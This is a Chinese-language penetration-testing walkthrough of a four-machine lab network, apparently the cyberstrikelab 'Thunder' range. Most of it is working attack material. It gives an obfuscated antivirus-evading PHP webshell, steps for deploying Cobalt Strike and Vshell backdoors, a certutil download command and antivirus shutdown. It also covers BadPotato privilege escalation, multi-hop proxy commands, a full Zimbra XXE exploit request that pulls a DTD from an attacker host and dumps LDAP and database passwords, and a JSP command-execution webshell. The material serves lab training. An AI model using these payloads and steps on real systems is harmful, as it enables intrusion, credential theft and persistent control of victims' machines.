域渗透之cyberstrikelab—Thunder
文章首发在:先知社区
原文链接:https://xz.aliyun.com/news/16753
入口机
信息收集
连上openvpn自动跳转到ThinkPHP页面
漏洞发现
利用ThinkPHP综合利用工具梭哈
发现有文件包含、数据库信息泄露、RCE漏洞。
直接可以读取C盘下面的flag.txt文件
漏洞利用
root root连上172.20.56.32的数据库,发现数据库里面没有什么东西
可以直接利用工具Getshell,但是有360全家桶和Defender,得做一下免杀,然后内容不能太多,文件过大也无法上传。
使用狐狸工具箱里面的弱鸡webshell免杀工具
<?php if ($_COOKIE['pNkIfG'] == "z8Igdk2RSHV3UAN") {
$SlysoQ='str_';
$QUWRfL=$SlysoQ.'replace';
$fCsZNz=substr($QUWRfL,6);
$zWmchr='zxcszxctzxcrzxc_zxcrzxcezxc';
if ($_GET['VdSXoL'] !== $_GET['UNkHtm'] && @md5($_GET['VdSXoL']) === @md5($_GET['UNkHtm'])){
$mbdisX = 'str_re';
$zWmchr=substr_replace('zxc',$mbdisX,$zWmchr);
}else{die();}
$fCsZNz=$zWmchr.$fCsZNz;
$PTEIhv = $fCsZNz("fylVHtYv0WbKr5snJ9NxiSCwMLAhzE6m2uqPQ3O8cXgZIdRjp7", "", "str_fylVHtYv0WbKr5snJ9NxiSCwMLAhzE6m2uqPQ3O8cXgZIdRjp7rfylVHtYv0WbKr5snJ9NxiSCwMLAhzE6m2uqPQ3O8cXgZIdRjp7eplfylVHtYv0WbKr5snJ9NxiSCwMLAhzE6m2uqPQ3O8cXgZIdRjp7acfylVHtYv0WbKr5snJ9NxiSCwMLAhzE6m2uqPQ3O8cXgZIdRjp7efylVHtYv0WbKr5snJ9NxiSCwMLAhzE6m2uqPQ3O8cXgZIdRjp7");
$aqoDYB = $PTEIhv("I3QmFdY26hBXw54UD1exczguZRatHlqSOLv0CnPA9EGMW87ykK", "", "baI3QmFdY26hBXw54UD1exczguZRatHlqSOLv0CnPA9EGMW87ykKsI3QmFdY26hBXw54UD1exczguZRatHlqSOLv0CnPA9EGMW87ykKe64_I3QmFdY26hBXw54UD1exczguZRatHlqSOLv0CnPA9EGMW87ykKdecoI3QmFdY26hBXw54UD1exczguZRatHlqSOLv0CnPA9EGMW87ykKdI3QmFdY26hBXw54UD1exczguZRatHlqSOLv0CnPA9EGMW87ykKeI3QmFdY26hBXw54UD1exczguZRatHlqSOLv0CnPA9EGMW87ykK");
$uyHEsY = $aqoDYB($PTEIhv("ncPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFy", "", "Y3JncPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFylYXncPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFyRlXncPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFy2Z1bncPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFymncPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFyN0ancPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFyWncPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFy9uncPZ3REJgMI6Uk5CQHodvf28t7BAYSax9Dpbe0rXsGKqVjhwFy"));
$xmPspC = $aqoDYB($PTEIhv("mW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhF", "", "ZXmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhFZhbmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhFCmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhFgmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhFkXmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhF1BPmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhFU1RbmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhFJmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhFwmW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhF=mW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhF=mW0IaB8ElpT5OY9v61ZbDzicu27sqfXt4GALPQkVrgSUeyCRhF"));
$YDkpLt = $aqoDYB($PTEIhv("FrTHbfNhvpDSVkE7uJtoBq2YgGC31OLlPQisnXZM5cwRxA4Ud9", "", "NkFrTHbfNhvpDSVkE7uJtoBq2YgGC31OLlPQisnXZM5cwRxA4Ud9RFrTHbfNhvpDSVkE7uJtoBq2YgGC31OLlPQisnXZM5cwRxA4Ud96FrTHbfNhvpDSVkE7uJtoBq2YgGC31OLlPQisnXZM5cwRxA4Ud9WXZBFrTHbfNhvpDSVkE7uJtoBq2YgGC31OLlPQisnXZM5cwRxA4Ud9ZFrTHbfNhvpDSVkE7uJtoBq2YgGC31OLlPQisnXZM5cwRxA4Ud9w==FrTHbfNhvpDSVkE7uJtoBq2YgGC31OLlPQisnXZM5cwRxA4Ud9"));
$ltSqyD = $aqoDYB($PTEIhv("IdveH4ZrQEpSwa5KnMBRYOcWTqJzAGkV6hiP2F9j3bufoX1ygt", "", "JIdveH4ZrQEpSwa5KnMBRYOcWTqJzAGkV6hiP2F9j3bufoX1ygt10IdveH4ZrQEpSwa5KnMBRYOcWTqJzAGkV6hiP2F9j3bufoX1ygtpOIdveH4ZrQEpSwa5KnMBRYOcWTqJzAGkV6hiP2F9j3bufoX1ygtw==IdveH4ZrQEpSwa5KnMBRYOcWTqJzAGkV6hiP2F9j3bufoX1ygt"));
@$tTkKl = $xmPspC;
@$$tTkKl = $YDkpLt;
@$SZcvn=$tTkKl.$$tTkKl;
@$oBqQO=$SZcvn;
@$$oBqQO=$ltSqyD;
@$OdXiD=$oBqQO;
@$yZVxm=$$oBqQO;
@$BYhPw = $uyHEsY('$QRDve,$EDgWN','return "$QRDve"."$EDgWN";');
@$zoJju=$BYhPw($OdXiD,$yZVxm);
@$hAsPry = $uyHEsY("", $zoJju);
@$hAsPry();
} ?>
使用蚁剑或者哥斯拉连接
权限维持
Vshell
然后上线Vshell和CS,Vshell不用免杀直接可以上线
设置监听172.16.233.2:9995
客户端生成
运行即可上线
CS
CS这里要做一下免杀
设置监听172.16.233.2:1234
生成后门程序
放到掩日里面生成通用免杀的exe程序
运行即可上线
提权
使用潇湘信安的PostExpKit插件里面的BadPotato
运行之前的后门程序,即可上线system
抓取明文密码
WIN-BCQDCARVJPJAdministrator::Tp@cslKM
使用谢公子的插件开启RDP服务
Vshell搭建第一层代理
使用Proxifier设置远程桌面走socks5代理
远程桌面上线
如果遇到这个问题,本地改一下组策略即可
上线之后,关闭360的主动防御和晶核,再给Defender干掉。
第二台机子
信息收集
172.20.57.98:139 open
172.20.57.30:139 open
172.20.57.98:135 open
172.20.57.30:135 open
172.20.57.30:80 open
172.20.57.98:445 open
172.20.57.30:445 open
172.20.57.98:3306 open
172.20.57.30:3306 open
172.20.57.98:3389 open
172.20.57.98:5985 open
172.20.57.30:10030 open
172.20.57.98:47001 open
172.20.57.98:49670 open
172.20.57.30:49670 open
172.20.57.98:49669 open
172.20.57.30:49669 open
172.20.57.98:49668 open
172.20.57.30:49668 open
172.20.57.98:49667 open
172.20.57.30:49667 open
172.20.57.98:49666 open
172.20.57.30:49666 open
172.20.57.98:49665 open
172.20.57.30:49665 open
172.20.57.98:49664 open
172.20.57.30:49664 open
[*] WebTitle:http://172.20.57.30 code:200 len:931 title:None
[+] NetInfo:
[*]172.20.57.98
[->]WIN-J2B9EIUKEN3
[->]172.20.57.98
[->]10.0.0.65
[+] NetInfo:
[*]172.20.57.30
[->]WIN-BCQDCARVJPJ
[->]172.20.56.32
[->]172.20.57.30
[*] 172.20.57.98 WORKGROUP\WIN-J2B9EIUKEN3 Windows Server 2016 Standard 14393
[*] WebTitle:http://172.20.57.98:5985 code:404 len:315 title:Not Found
[*] WebTitle:http://172.20.57.98:47001 code:404 len:315 title:Not Found
[+] http://172.20.57.30 poc-yaml-thinkphp5-controller-rce
漏洞发现
发现172.20.57.98开了3389和3306,根据提示cslab作为账号密码
使用Tscan爆破即可,发现3306账号root,密码cslab
漏洞利用
使用MDUT连接数据库,UDF提权
https://github.com/SafeGroceryStore/MDUT
https://github.com/DeEpinGh0st/MDUT-Extend-Release
发现是低权限用户,无法读取C盘下的flag文件,想办法上线C2
权限维持
用第一台机子作为跳板,上传文件
certutil -urlcache -split -f http://172.20.57.30/fscan.exe fscan.exe
Vshell
生成正向客户端
然后上传到目标机上执行
连接即可
CS
CS的马要免杀一下,因为目标机有Defender
转发上线
设置监听
设置socks4代理
生成后门程序
使用掩日的本地分离进行免杀
执行即可上线
提权
使用潇湘信安的PostExpKit插件里面的BadPotato
运行之前的后门程序,即可上线system
这里默认开了3389,但是抓不到明文密码,使用谢公子的插件直接创建一个用户
Vshell搭建第二层代理
使用Proxifier设置远程桌面走socks5代理
远程桌面上线
直接给杀软干掉。
第三台机子
信息收集
10.0.0.65:139 open
10.0.0.65:135 open
10.0.0.34:80 open
10.0.0.34:22 open
10.0.0.65:445 open
10.0.0.65:3306 open
10.0.0.65:3389 open
10.0.0.65:5985 open
10.0.0.34:22956 open
10.0.0.65:47001 open
10.0.0.65:49664 open
10.0.0.65:49670 open
10.0.0.65:49669 open
10.0.0.65:49668 open
10.0.0.65:49667 open
10.0.0.65:49666 open
10.0.0.65:49665 open
[+] NetInfo:
[*]10.0.0.65
[->]WIN-J2B9EIUKEN3
[->]172.20.57.98
[->]10.0.0.65
[*] WebTitle:http://10.0.0.34:22956 code:200 len:6869 title:小皮面板
[*] WebTitle:http://10.0.0.65:5985 code:404 len:315 title:Not Found
[*] WebTitle:http://10.0.0.65:47001 code:404 len:315 title:Not Found
80端口是Zblog服务,发现是ZBlog1.7.3版本
第二台机子上有数据库
直接改md5不行
漏洞发现
直接去github找源代码
zblogphpzb_system unctionlibasemember.php文件记录了,password生成方式
/**
* 静态方法,获取加盐及二次散列的,用于保存的最终密码
*
* @param string $ps 明文密码
* @param string $guid 用户唯一码
*
* @return string
*/
public static function GetPassWordByGuid($ps, $guid)
{
return md5(md5($ps) . $guid);
}
- 明文密码:首先,有一个明文密码
ps
,在你的例子中是"123456"
。
- 用户唯一码(盐) :然后,有一个用户唯一码
guid
作为“盐”,用于增加密码的安全性。在这个例子中,guid
是"24d876c8772572cf839674c5a176e41c"
。
- 第一次MD5散列:对明文密码进行第一次MD5散列计算。对于
"123456"
,其MD5散列值为"e10adc3949ba59abbe56e057f20f883e"
。
- 连接盐:将第一次散列的结果与用户的唯一码(盐)连接起来,形成一个新的字符串。即
"e10adc3949ba59abbe56e057f20f883e24d876c8772572cf839674c5a176e41c"
。
- 第二次MD5散列:对上一步得到的新字符串进行第二次MD5散列计算。最终结果是
"30492f76a0fbcf3906cce8b4b566d6b6"
,这即是保存到数据库中的加密密码。
漏洞利用
把30492f76a0fbcf3906cce8b4b566d6b6
替换掉数据库里面的hash即可进入后台
看了官方的回复说明后台还是有地方能getshell的
参考:https://github.com/fengyijiu520/Z-Blog-
路径:http:/10.0.0.34/zb_users/theme/shell/template/shelll.php 密码:pass
这里蚁剑直接走proxifier的两层代理即可
提权
然后发现有www用户可以sudo执行/home/www/write.sh文件
直接利用他改root密码,ssh连接
echo root:password|chpasswd
Stowaway搭建第三层代理
这里不知道怎么上线vshell走三层代理,所以使用Venom或者Stowaway搭三层代理
命令也很简单
第一层
攻击机
windows_admin.exe -l 172.16.233.2:9000 -s 123
目标机
windows_x64_agent.exe -c 172.16.233.2:9000 -s 123 --reconnect 8
第二层
攻击机
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 9000
目标机
windows_agent.exe -c 172.20.57.30:9000 -s 123 --reconnect 8
第三层
攻击机
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 9000
目标机
./linux_x64_agent -c 10.0.0.65:9000 -s 123 --reconnect 8
然后挨个进去socks设置代理
第四台机子
信息收集
10.1.1.56:11211 open
10.1.1.56:443 open
10.1.1.78:80 open
10.1.1.78:22 open
10.1.1.56:22 open
10.1.1.56:7071 open
10.1.1.56:8443 open
[*] WebTitle http://10.1.1.78 code:200 len:7124 title:Good Luck To You! - cyberstrikelab
[+] Memcached 10.1.1.56:11211 unauthorized
漏洞发现
10.1.1.56:8443是zimbra
搜索了一下Nday发现
简介:
Zimbra 是一家提供专业的电子邮件软件开发供应商,主要提供 Zimbra Collaboration Server 协作服务器套件、Zimbra Desktop 邮件管理软件等邮件方面的软件。
当 Zimbra 存在像任意文件读取、XXE(XML 外部实体注入) 这种漏洞时,攻击者可以利用此漏洞读取 localconfig.xml 配置文件,获取到 zimbra admin ldap password,并通过 7071 admin 端口进行 SOAP AuthRequest 认证,得到 admin authtoken,然后就可以利用 admin authtoken 进行任意文件上传,从而达到远程代码执行的危害。
影响范围:
Zimbra < 8.7.1 攻击者可以在无需登录的情况下,实现getshell
Zimbra<8.8.11 在服务端使用Memcached做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行
漏洞利用
打的时候遇到点问题,走浏览器的SwitchyOmega可以正常访问,但是走proxychain或者proxifier就不行
我一开始怀疑防火墙和出入站规则,但是全放开也没用,后面想到两个解决方案
方法一
浏览器可以正常访问,burpsuite抓包打即可。
zimbra攻防笔记-XXE+SSRF RCE – NooEmotionの摆烂屋
方法二
修改第三台机子的root密码,可以利用SSH做正向代理,就是攻击机通过一台可以SSH访问的机子(第三台机子)访问Zimbra服务。
https://mp.weixin.qq.com/s/TodlZ4cS2PwCU--pM49gEA
proxychain ssh -L 8889:10.1.1.56:8443 root@10.0.0.34
也就是访问127.0.0.1:8889相当于访问10.1.1.56:8443
然后在第三台机子/xp/www目录下放1.dtd文件
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
bp抓包
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 127.0.0.1:8889
Cookie: ZM_TEST=true
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 398
<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://10.1.1.78/1.dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
直接读取密码
HTTP/1.1 503 Requested response schema not available <localconfig>? <key name="ssl_default_digest">? <value>sha256</value>? </key>? <key name="mailboxd_java_heap_size">? <value>256</value>? </key>? <key name="ssl_allow_mismatched_certs">? <value>true</value>? </key>? <key name="snmp_notify">? <value>yes</value>? </key>? <key name="zimbra_java_home">? <value>/opt/zimbra/java</value>? </key>? <key name="ldap_port">? <value>389</value>? </key>? <key name="mailboxd_keystore">? <value>/opt/zimbra/mailboxd/etc/keystore</value>? </key>? <key name="mailboxd_keystore_password">? <value>Oj1YctFK</value>? </key>? <key name="mailboxd_truststore">? <value>/opt/zimbra/java/jre/lib/security/cacerts</value>? </key>? <key name="av_notify_user">? <value>admin@mail.cslab.com</value>? </key>? <key name="mailboxd_directory">? <value>/opt/zimbra/mailboxd</value>? </key>? <key name="av_notify_domain">? <value>mail.cslab.com</value>? </key>? <key name="zimbra_require_interprocess_secur
Date: Sun, 02 Feb 2025 15:45:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 11967
Connection: close
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Error 503 Requested response schema not available <localconfig>
<key name="ssl_default_digest">
<value>sha256</value>
</key>
<key name="mailboxd_java_heap_size">
<value>256</value>
</key>
<key name="ssl_allow_mismatched_certs">
<value>true</value>
</key>
<key name="snmp_notify">
<value>yes</value>
</key>
<key name="zimbra_java_home">
<value>/opt/zimbra/java</value>
</key>
<key name="ldap_port">
<value>389</value>
</key>
<key name="mailboxd_keystore">
<value>/opt/zimbra/mailboxd/etc/keystore</value>
</key>
<key name="mailboxd_keystore_password">
<value>Oj1YctFK</value>
</key>
<key name="mailboxd_truststore">
<value>/opt/zimbra/java/jre/lib/security/cacerts</value>
</key>
<key name="av_notify_user">
<value>admin@mail.cslab.com</value>
</key>
<key name="mailboxd_directory">
<value>/opt/zimbra/mailboxd</value>
</key>
<key name="av_notify_domain">
<value>mail.cslab.com</value>
</key>
<key name="zimbra_require_interprocess_security">
<value>1</value>
</key>
<key name="zimbra_gid">
<value>995</value>
</key>
<key name="ldap_amavis_password">
<value>rhqkAlU5n_</value>
</key>
<key name="ldap_url">
<value>ldap://mail.cslab.com:389</value>
</key>
<key name="ldap_starttls_supported">
<value>1</value>
</key>
<key name="smtp_source">
<value>admin@mail.cslab.com</value>
</key>
<key name="ssl_allow_untrusted_certs">
<value>false</value>
</key>
<key name="zimbra_user">
<value>zimbra</value>
</key>
<key name="ldap_replication_password">
<value>rhqkAlU5n_</value>
</key>
<key name="postfix_setgid_group">
<value>postdrop</value>
</key>
<key name="zimbra_mysql_password">
<value>i.OURb7v4t.oE_ttiws_9dcYz2</value>
</key>
<key name="smtp_notify">
<value>yes</value>
</key>
<key name="ldap_postfix_password">
<value>rhqkAlU5n_</value>
</key>
<key name="mysql_root_password">
<value>P4YtmUFaty8FlD3a7DrqiEXdURMwVZf0</value>
</key>
<key name="mailboxd_server">
<value>jetty</value>
</key>
<key name="ldap_bes_searcher_password">
<value>rhqkAlU5n_</value>
</key>
<key name="zimbra_mysql_connector_maxActive">
<value>100</value>
</key>
<key name="ldap_nginx_password">
<value>rhqkAlU5n_</value>
</key>
<key name="ldap_master_url">
<value>ldap://mail.cslab.com:389</value>
</key>
<key name="zimbra_ldap_password">
<value>rhqkAlU5n_</value>
</key>
<key name="snmp_trap_host">
<value>mail.cslab.com</value>
</key>
<key name="zimbra_zmjava_options">
<value>-Xmx256m -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djdk.tls.client.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djava.net.preferIPv4Stack=true</value>
</key>
<key name="ldap_accesslog_maxsize">
<value>18238930944</value>
</key>
<key name="smtp_destination">
<value>admin@mail.cslab.com</value>
</key>
<key name="zimbra_mail_service_port">
<value>8080</value>
</key>
<key name="mysql_bind_address">
<value>127.0.0.1</value>
</key>
<key name="mailboxd_truststore_password">
<value>changeit</value>
</key>
<key name="ldap_host">
<value>mail.cslab.com</value>
</key>
<key name="zmtrainsa_cleanup_host">
<value>true</value>
</key>
<key name="antispam_mysql_host">
<value>127.0.0.1</value>
</key>
<key name="zimbra_zmprov_default_to_ldap">
<value>false</value>
</key>
<key name="zimbra_uid">
<value>997</value>
</key>
<key name="mailboxd_java_options">
<value>-server -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djdk.tls.client.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djava.awt.headless=true -Dsun.net.inetaddr.ttl=${networkaddress_cache_ttl} -Dorg.apache.jasper.compiler.disablejsr199=true -XX:+UseConcMarkSweepGC -XX:PermSize=128m -XX:MaxPermSize=350m -XX:SoftRefLRUPolicyMSPerMB=1 -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCApplicationStoppedTime -XX:-OmitStackTraceInFastThrow -Xloggc:/opt/zimbra/log/gc.log -XX:-UseGCLogFileRotation -XX:NumberOfGCLogFiles=20 -XX:GCLogFileSize=4096K -Djava.net.preferIPv4Stack=true</value>
</key>
<key name="ldap_is_master">
<value>true</value>
</key>
<key name="zimbra_server_hostname">
<value>mail.cslab.com</value>
</key>
<key name="ldap_root_password">
<value>rhqkAlU5n_</value>
</key>
<key name="postfix_mail_owner">
<value>postfix</value>
</key>
<key name="zimbra_ldap_userdn">
<value>uid=zimbra,cn=admins,cn=zimbra</value>
</key>
<key name="ldap_db_maxsize">
<value>18238930944</value>
</key>
</localconfig>
</title>
</head>
<body><h2>HTTP ERROR 503</h2>
<p>Problem accessing /service/autodiscover/Autodiscover.xml. Reason:
<pre> Requested response schema not available <localconfig>
<key name="ssl_default_digest">
<value>sha256</value>
</key>
<key name="mailboxd_java_heap_size">
<value>256</value>
</key>
<key name="ssl_allow_mismatched_certs">
<value>true</value>
</key>
<key name="snmp_notify">
<value>yes</value>
</key>
<key name="zimbra_java_home">
<value>/opt/zimbra/java</value>
</key>
<key name="ldap_port">
<value>389</value>
</key>
<key name="mailboxd_keystore">
<value>/opt/zimbra/mailboxd/etc/keystore</value>
</key>
<key name="mailboxd_keystore_password">
<value>Oj1YctFK</value>
</key>
<key name="mailboxd_truststore">
<value>/opt/zimbra/java/jre/lib/security/cacerts</value>
</key>
<key name="av_notify_user">
<value>admin@mail.cslab.com</value>
</key>
<key name="mailboxd_directory">
<value>/opt/zimbra/mailboxd</value>
</key>
<key name="av_notify_domain">
<value>mail.cslab.com</value>
</key>
<key name="zimbra_require_interprocess_security">
<value>1</value>
</key>
<key name="zimbra_gid">
<value>995</value>
</key>
<key name="ldap_amavis_password">
<value>rhqkAlU5n_</value>
</key>
<key name="ldap_url">
<value>ldap://mail.cslab.com:389</value>
</key>
<key name="ldap_starttls_supported">
<value>1</value>
</key>
<key name="smtp_source">
<value>admin@mail.cslab.com</value>
</key>
<key name="ssl_allow_untrusted_certs">
<value>false</value>
</key>
<key name="zimbra_user">
<value>zimbra</value>
</key>
<key name="ldap_replication_password">
<value>rhqkAlU5n_</value>
</key>
<key name="postfix_setgid_group">
<value>postdrop</value>
</key>
<key name="zimbra_mysql_password">
<value>i.OURb7v4t.oE_ttiws_9dcYz2</value>
</key>
<key name="smtp_notify">
<value>yes</value>
</key>
<key name="ldap_postfix_password">
<value>rhqkAlU5n_</value>
</key>
<key name="mysql_root_password">
<value>P4YtmUFaty8FlD3a7DrqiEXdURMwVZf0</value>
</key>
<key name="mailboxd_server">
<value>jetty</value>
</key>
<key name="ldap_bes_searcher_password">
<value>rhqkAlU5n_</value>
</key>
<key name="zimbra_mysql_connector_maxActive">
<value>100</value>
</key>
<key name="ldap_nginx_password">
<value>rhqkAlU5n_</value>
</key>
<key name="ldap_master_url">
<value>ldap://mail.cslab.com:389</value>
</key>
<key name="zimbra_ldap_password">
<value>rhqkAlU5n_</value>
</key>
<key name="snmp_trap_host">
<value>mail.cslab.com</value>
</key>
<key name="zimbra_zmjava_options">
<value>-Xmx256m -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djdk.tls.client.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djava.net.preferIPv4Stack=true</value>
</key>
<key name="ldap_accesslog_maxsize">
<value>18238930944</value>
</key>
<key name="smtp_destination">
<value>admin@mail.cslab.com</value>
</key>
<key name="zimbra_mail_service_port">
<value>8080</value>
</key>
<key name="mysql_bind_address">
<value>127.0.0.1</value>
</key>
<key name="mailboxd_truststore_password">
<value>changeit</value>
</key>
<key name="ldap_host">
<value>mail.cslab.com</value>
</key>
<key name="zmtrainsa_cleanup_host">
<value>true</value>
</key>
<key name="antispam_mysql_host">
<value>127.0.0.1</value>
</key>
<key name="zimbra_zmprov_default_to_ldap">
<value>false</value>
</key>
<key name="zimbra_uid">
<value>997</value>
</key>
<key name="mailboxd_java_options">
<value>-server -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djdk.tls.client.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djava.awt.headless=true -Dsun.net.inetaddr.ttl=${networkaddress_cache_ttl} -Dorg.apache.jasper.compiler.disablejsr199=true -XX:+UseConcMarkSweepGC -XX:PermSize=128m -XX:MaxPermSize=350m -XX:SoftRefLRUPolicyMSPerMB=1 -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCApplicationStoppedTime -XX:-OmitStackTraceInFastThrow -Xloggc:/opt/zimbra/log/gc.log -XX:-UseGCLogFileRotation -XX:NumberOfGCLogFiles=20 -XX:GCLogFileSize=4096K -Djava.net.preferIPv4Stack=true</value>
</key>
<key name="ldap_is_master">
<value>true</value>
</key>
<key name="zimbra_server_hostname">
<value>mail.cslab.com</value>
</key>
<key name="ldap_root_password">
<value>rhqkAlU5n_</value>
</key>
<key name="postfix_mail_owner">
<value>postfix</value>
</key>
<key name="zimbra_ldap_userdn">
<value>uid=zimbra,cn=admins,cn=zimbra</value>
</key>
<key name="ldap_db_maxsize">
<value>18238930944</value>
</key>
</localconfig>
</pre></p><hr><i><small>Powered by Jetty://</small></i><hr/>
</body>
</html>
拿到ldap_root_password
zimbra
rhqkAlU5n_
直接打exphttps://github.com/3gstudent/Homework-of-Python/blob/master/Zimbra_SOAP_API_Manage.py
python3 Zimbra_SOAP_API_Manage.py https://127.0.0.0:8889 zimbra rhqkAlU5n_ ssrf
选择功能
uploadwebshell
传shell.jsp
<!-- gh/aels -->
<H1><CENTER>404 Not Found</CENTER></H1>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
String error = "";
if(cmd != null) {
String[] commandAndArgs = new String[]{ "/bin/bash", "-c", cmd };
String s = null;
Process process = Runtime.getRuntime().exec(commandAndArgs);
InputStream inputStream = process.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
Thread.sleep(2000);
while(process.isAlive()) Thread.sleep(100);
while((s = reader.readLine()) != null) { output += s+"\n"; }
reader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
while((s = reader.readLine()) != null) { error += s+"\n"; }
}
%>
<FORM><INPUT name=cmd style=border:0;display:block; type=text value='<%=cmd %>'></FORM>
<pre>
<%=output %>
<%=error %>
</pre>
然后有一个弹窗
Cookie传入
ZM_ADMIN_AUTH_TOKEN=0_c49cbfdfbbda6ab4b301ae8989f4f95f3ca82c8a_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313733383535333638323631383b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d393a3933333134333038303b
就可以执行命令了
- 点赞
- 收藏
- 关注作者
评论(0)